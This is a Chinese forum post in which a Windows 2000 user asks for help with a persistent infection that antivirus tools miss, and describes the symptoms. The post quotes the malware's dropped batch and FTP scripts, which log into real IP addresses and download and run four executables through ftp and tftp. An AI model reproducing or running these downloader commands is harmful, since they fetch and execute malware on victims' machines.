一个奇怪的病毒
小弟的机器是WIN2000的系统,几天前染毒,一直没能清理掉它,安全软件装的有卡巴斯基6.0个人版,360安全卫士,用它们进行扫描,结果那是相当差!!!它们居然一个也查不到,显示我的系统正常!现在把我机器的情况说明一下:
先让大家看看木马病毒下到C根目录下的文件一些源码
hgl1.bat
ftp -s:c:\hgl1.txt
c:\my_70153.exe
c:\1022.exe
c:\setup1004.exe
c:\yoyo.exe
hgl1.txt
open 219.153.11.219
test
test
get 88.exe c:\1022.exe
get 66.exe c:\my_70153.exe
get 99.exe c:\setup1004.exe
get 77.exe c:\yoyo.exe
quit
fbn3.bat
tftp -i 61.175.194.140 get my_70153.exe
tftp -i 61.175.194.140 get setup1004.exe
tftp -i 61.175.194.140 get 1022.exe
tftp -i 61.175.194.140 get yoyo.exe
my_70153.exe
1022.exe
setup1004.exe
yoyo.exe
360的进程表分析里面全是安全的进程,我这两天结合卡巴发现,当系统调用winmgmt.exe(安全进程)时,接着进程表里就会出现cmd.exe,cscript.exe,ftp.exe,tftp.exe.这些都是安全进程,接着它就会出现一个run.vbs或run2.vbs(因为先前我删了它,所以没有内容给你们看),还有个firefoxupdater.exe(这个的名字记不很清楚),这些被卡巴的注册表保护阻止之后就会消失,所以也查不到了,一般还会在%systemroot%system32%inf下面释放三个文件,其中一个是svchosts.exe,现在最让我烦的是它们隔一段时间发一次,没办法查的到它,请高手指点一下!!!
[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
